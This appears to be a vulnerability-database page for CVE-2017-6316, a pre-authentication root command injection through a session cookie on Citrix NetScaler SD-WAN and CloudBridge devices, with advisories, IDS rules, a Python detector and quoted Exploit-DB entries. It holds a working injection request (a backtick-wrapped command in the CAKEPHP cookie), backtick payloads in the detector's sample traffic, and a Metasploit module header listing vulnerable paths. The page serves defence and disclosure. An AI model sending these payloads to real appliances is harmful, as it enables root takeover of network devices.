CVE-2017-6316
Published: 2017-07-20
Priority: P195 · critical · CVSS 3.1 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Flags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, due 2022-04-15
Exploited in the wild
EPSS: 72.60% (99.4th percentile)
Citrix NetScaler SD-WAN devices through v9.1.2.26.561201 allow remote attackers to execute arbitrary shell commands as root via a CGISESSID cookie. On CloudBridge (the former name of NetScaler SD-WAN) devices, the cookie name was CAKEPHP rather than CGISESSID.
Affected (10 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| citrix | citrix_adm | — | — |
| citrix | citrix_hypervisor | — | — |
| citrix | citrix_virtual_apps_and_desktops | — | — |
| citrix | endpoint_management | — | — |
| citrix | netscaler_adc | — | — |
| citrix | netscaler_adc_gateway | — | — |
| citrix | netscaler_gateway | — | — |
| citrix | netscaler_sd-wan | <= 9.1.2.26.561201 | — |
| citrix | sd-wan | — | — |
| citrix | xenserver | — | — |
Detection & IOCs (extracted from sources)
Snort rule:
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Citrix NetScaler SD-WAN 9.1.2.26.561201 Devices CVE-2017-6316 (Outbound)"; flow:established,to_server; urilen:13; http.method; content:"POST"; http.uri; content:"/global_data/"; fast_pattern; http.cookie; content:"`"; content:"http"; distance:0; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2017-6316; classtype:attempted-admin; sid:2029164; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2017_6316, deployment Perimeter, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_10_26;)
- Detect POST requests to /global_data/ with backtick characters in the Cookie header (CGISESSID); this indicates a command injection attempt.
- Monitor for POST requests to /cgi-bin/login.cgi with a CAKEPHP cookie value containing backtick-wrapped shell commands (CloudBridge devices).
- Alert on POST to /login with a username field containing backtick-wrapped commands (SD-WAN Center variant via UsersController.php).
- Watch for creation or execution of dropped ELF payloads at /tmp/m or /tmp/n following exploitation, especially via sudo.
- The Snort/ET rule (sid:2029164) keys on three conditions: the POST method, a URI length of exactly 13 bytes (/global_data/), and a backtick in the cookie. All three together are a strong signal.
- The vulnerable cookie name differs by product: CGISESSID on NetScaler SD-WAN appliances, CAKEPHP on CloudBridge (the former name) devices. Detection rules must cover both cookie names.
- A related but distinct unauthenticated RCE exists in SD-WAN Center (10.2.0.136.733315) via the username POST parameter to /login, not the cookie, and requires separate detection logic.
- The ET Snort rule (sid:2029164) is tuned for outbound traffic ($HOME_NET -> $EXTERNAL_NET) and a URI length of exactly 13 bytes; perimeter placement is recommended per the rule metadata.
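As an added example (not part of this record, and not Proofpoint's or Emerging Threats' code), the Python below reproduces the three conditions the ET rule keys on (POST, a 13-byte URI of /global_data/, a backtick in the Cookie header followed by "http") and extends it with the cookie-name caveat above: a second, broader check looks for shell metacharacters in either session cookie, CGISESSID or CAKEPHP, on any POST, after percent-decoding the value. The sample requests are constructed; the first mirrors the Exploit-DB CloudBridge request quoted further down this page, the others use documentation addresses.

```python
# Added example: request-level detector for the CVE-2017-6316 cookie pattern.
# Reproduces the logic of ET sid:2029164/2029165 and adds a broader check
# covering both cookie names from the advisory. Sample traffic is constructed.
from dataclasses import dataclass
from urllib.parse import unquote

# Session cookie names that reach the vulnerable code path: CGISESSID on
# NetScaler SD-WAN appliances, CAKEPHP on CloudBridge (the former name).
SESSION_COOKIES = ("CGISESSID", "CAKEPHP")


@dataclass(frozen=True)
class Finding:
    rule: str       # which check fired
    cookie: str     # cookie name involved ("" when only the ET check fired)
    evidence: str   # the offending value, for the alert body


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, uri, headers).

    Header names are lower-cased; only the head before the blank line is read.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, uri, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, uri, headers


def parse_cookies(header: str) -> dict:
    """Turn 'a=1; b=2' into {'a': '1', 'b': '2'}; values keep their raw form."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.partition("=")
        if sep:
            cookies[name.strip()] = value.strip()
    return cookies


def et_rule_matches(method: str, uri: str, cookie_header: str) -> bool:
    """Equivalent of sid:2029164/2029165: POST, urilen:13 on /global_data/,
    and a backtick in the Cookie header followed (distance:0) by 'http'."""
    if method != "POST" or len(uri) != 13 or not uri.startswith("/global_data/"):
        return False
    tick = cookie_header.find("`")
    return tick != -1 and "http" in cookie_header[tick + 1:]


def inspect_request(raw: str) -> list:
    """Return the findings for one raw request (empty list means nothing seen)."""
    method, uri, headers = parse_request(raw)
    cookie_header = headers.get("cookie", "")
    findings = []
    if et_rule_matches(method, uri, cookie_header):
        findings.append(Finding("ET 2029164/2029165", "", cookie_header))
    # Broader check (assumption: any POST, either cookie name). The session
    # cookie should be an opaque token, so shell metacharacters in it are a
    # strong signal on their own. Percent-decode first so an encoded value is
    # compared in the form the server would see.
    if method == "POST":
        for name, value in parse_cookies(cookie_header).items():
            decoded = unquote(value)
            if name in SESSION_COOKIES and any(ch in decoded for ch in "`$;|"):
                findings.append(Finding("session-cookie-metachar", name, decoded))
    return findings


# Constructed sample traffic (not captured data). "cloudbridge" mirrors the
# Exploit-DB request on this page; "sdwan_global_data" is shaped to satisfy
# the ET rule; "benign" is an ordinary request with an opaque session id.
SAMPLES = {
    "cloudbridge": (
        "POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1\r\n"
        "Host: 10.242.129.149\r\n"
        "Cookie: CAKEPHP=`sleep 10`\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: 13\r\n\r\naction=logout"
    ),
    "sdwan_global_data": (
        "POST /global_data/ HTTP/1.1\r\n"
        "Host: 192.0.2.10\r\n"
        "Cookie: CGISESSID=`id` http\r\n\r\n"
    ),
    "benign": (
        "POST /global_data/ HTTP/1.1\r\n"
        "Host: 192.0.2.10\r\n"
        "Cookie: CGISESSID=0f3a9c1e7b2d4e5f\r\n\r\n"
    ),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, [(f.rule, f.cookie) for f in inspect_request(raw)])
```

The CloudBridge request is missed by the ET conditions (its URI is not /global_data/ and is not 13 bytes long) and is caught only by the broader cookie check, which is exactly the coverage gap the cookie-name bullet above describes; the /global_data/ sample trips both checks, and the benign request trips neither.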
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |
GHSA
GHSA-9f8x-323m-6vw4: Citrix NetScaler SD-WAN devices through v9
ghsa_unreviewed · 2022-05-17 · CVE-2017-6316 [CRITICAL] CWE-20
Citrix NetScaler SD-WAN devices through v9.1.2.26.561201 allow remote attackers to execute arbitrary shell commands as root via a CGISESSID cookie. On CloudBridge (the former name of NetScaler SD-WAN) devices, the cookie name was CAKEPHP rather than CGISESSID.
VulnCheck
Citrix Multiple Products Remote Code Execution Vulnerability
vulncheck · 2017 · CVSS 9.8 · CVE-2017-6316 [CRITICAL] CWE-20
A vulnerability has been identified in the management interface of Citrix NetScaler SD-WAN Enterprise and Standard Edition and Citrix CloudBridge Virtual WAN Edition that could result in an unauthenticated, remote attacker being able to execute arbitrary code as a root user. This vulnerability also affects XenMobile Server.
Affected: Citrix NetScaler SD-WAN Enterprise, CloudBridge Virtual WAN, and XenMobile Server
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada; https://w
CISA
Citrix Multiple Products Remote Code Execution Vulnerability
cisa · 2022-03-25 · CVSS 9.8 · CVE-2017-6316 [CRITICAL] CWE-20
Affected: Citrix NetScaler SD-WAN Enterprise, CloudBridge Virtual WAN, and XenMobile Server
A vulnerability has been identified in the management interface of Citrix NetScaler SD-WAN Enterprise and Standard Edition and Citrix CloudBridge Virtual WAN Edition that could result in an unauthenticated, remote attacker being able to execute arbitrary code as a root user. This vulnerability also affects XenMobile Server.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2017-6316
Remediation Due Date: 2022-04-15
Citrix
CVE-2017-6316: Citrix NetScaler SD-WAN devices through v9.1.2.26.561201 allow remote attackers to execute arbitrary shell commands as root via a CGISESSID cookie
vendor_citrix · 2017-07-20 · CVSS 9.8 · CVE-2017-6316 [CRITICAL]
Citrix NetScaler SD-WAN devices through v9.1.2.26.561201 allow remote attackers to execute arbitrary shell commands as root via a CGISESSID cookie. On CloudBridge (the former name of NetScaler SD-WAN) devices, the cookie name was CAKEPHP rather than CGISESSID.
CISA KEV: A vulnerability has been identified in the management interface of Citrix NetScaler SD-WAN Enterprise and Standard Edition and Citrix CloudBridge Virtual WAN Edition that could result in an unauthenticated, remote attacker being able to execute arbitrary code as a root user. This vulnerability also affects XenMobile Server.
Required Action: Apply updates per vendor instructions.
Citrix
Citrix Security Bulletin CTX225990
vendor_citrix · CVSS 9.8 · CVE-2017-6316 [CRITICAL]
CVE References: CVE-2017-6316, CVE-2025-12101, CVE-2025-62626, CVE-2026-23554, CVE-2026-3055, CVE-2026-4368, CVE-2026-4397
Affected Products: Citrix ADM, Citrix Hypervisor, Citrix Virtual Apps and Desktops, Endpoint Management, NetScaler ADC, NetScaler Gateway, XenServer
Suricata
ET EXPLOIT Citrix NetScaler SD-WAN 9.1.2.26.561201 Devices CVE-2017-6316 (Outbound)
suricata · 2019-12-16 · CVSS 9.8 · CVE-2017-6316 [CRITICAL]
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Citrix NetScaler SD-WAN 9.1.2.26.561201 Devices CVE-2017-6316 (Outbound)"; flow:established,to_server; urilen:13; http.method; content:"POST"; http.uri; content:"/global_data/"; fast_pattern; http.cookie; content:"`"; content:"http"; distance:0; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2017-6316; classtype:attempted-admin; sid:2029164; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2017_6316, deployment Perimeter, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_10_26;)
Suricata
ET EXPLOIT Citrix NetScaler SD-WAN 9.1.2.26.561201 Devices CVE-2017-6316 (Inbound)
suricata · 2019-12-16 · CVSS 9.8 · CVE-2017-6316 [CRITICAL]
Rule: alert http $EXTERNAL_NET any -> any any (msg:"ET EXPLOIT Citrix NetScaler SD-WAN 9.1.2.26.561201 Devices CVE-2017-6316 (Inbound)"; flow:established,to_server; urilen:13; http.method; content:"POST"; http.uri; content:"/global_data/"; fast_pattern; http.cookie; content:"`"; content:"http"; distance:0; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2017-6316; classtype:attempted-admin; sid:2029165; rev:2; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2017_6316, deployment Perimeter, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_a
Exploit-DB
Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection
exploitdb · 2017-07-19 · CVE-2017-6316
---
POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1
Host: 10.242.129.149
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://10.242.129.149/cgi-bin/login.cgi?redirect=/
Cookie: CAKEPHP=`sleep 10`
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
action=logout
Exploit-DB
Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)
exploitdb · 2017-07-19 · CVE-2017-6316
---
# Exploit Title: Citrix SD-WAN logout cookie preauth Remote Command Injection Vulnerability
# Date: 02/20/2017
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.citrix.com
# Software Link: https://www.citrix.com/downloads/cloudbridge/
# Version: 9.1.2.26.561201
# Tested on: 9.1.2.26.561201 (OS partition 4.6)
#
# CVE : (awaiting cve)
# vuln: CGISESSID Cookie parameter
# associated vuln urls:
# /global_data/
# /global_data/headerdata
# /log
# /
# /r9-1-2-26-561201/configuration/
# /r9-1-2-26-561201/configuration/edit
# /r9-1-2-26-561201/configuration/www.citrix.com [CGISESSID cookie]
#
# Description PreAuth Remote Root Citrix SD-WAN 'Citrix SD-WAN CGISESSID Cookie Remote Root',
'Description' => %q{
This modul
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42 · 2019-12-13 · Ruchna Nigam · Published: December 13, 2019
Tags: Malware, Threat Research, Vulnerabilities, Echobot, IoT, IoT Vulnerability, Mirai, Mirai variant
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploited in the wild until now, ranging from extremely old CVEs from as long back as 2003, to recent vulnerabilities made public as recently as early December 2019. Based on this seemingly odd choice, one could risk a guess that the attackers could potentially be aiming for the sweet sp
Tenable
Critical OS Command Injection Vulnerability in Citrix SD-WAN Center Discovered
blogs_tenable · 2019-04-11
Tenable
Citrix SD-WAN Center and NetScaler SD-WAN Center Unauthenticated Remote Command Injection
blogs_tenable · 2019-04-10
References
- http://www.securityfocus.com/bid/99943
- http://www.securitytracker.com/id/1039019
- https://support.citrix.com/article/CTX225990
- https://www.exploit-db.com/exploits/42345/
- https://www.exploit-db.com/exploits/42346/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-6316
Timeline
- 2017-07-20: Published
- 2022-03-25: Added to CISA KEV
- Exploited in the wild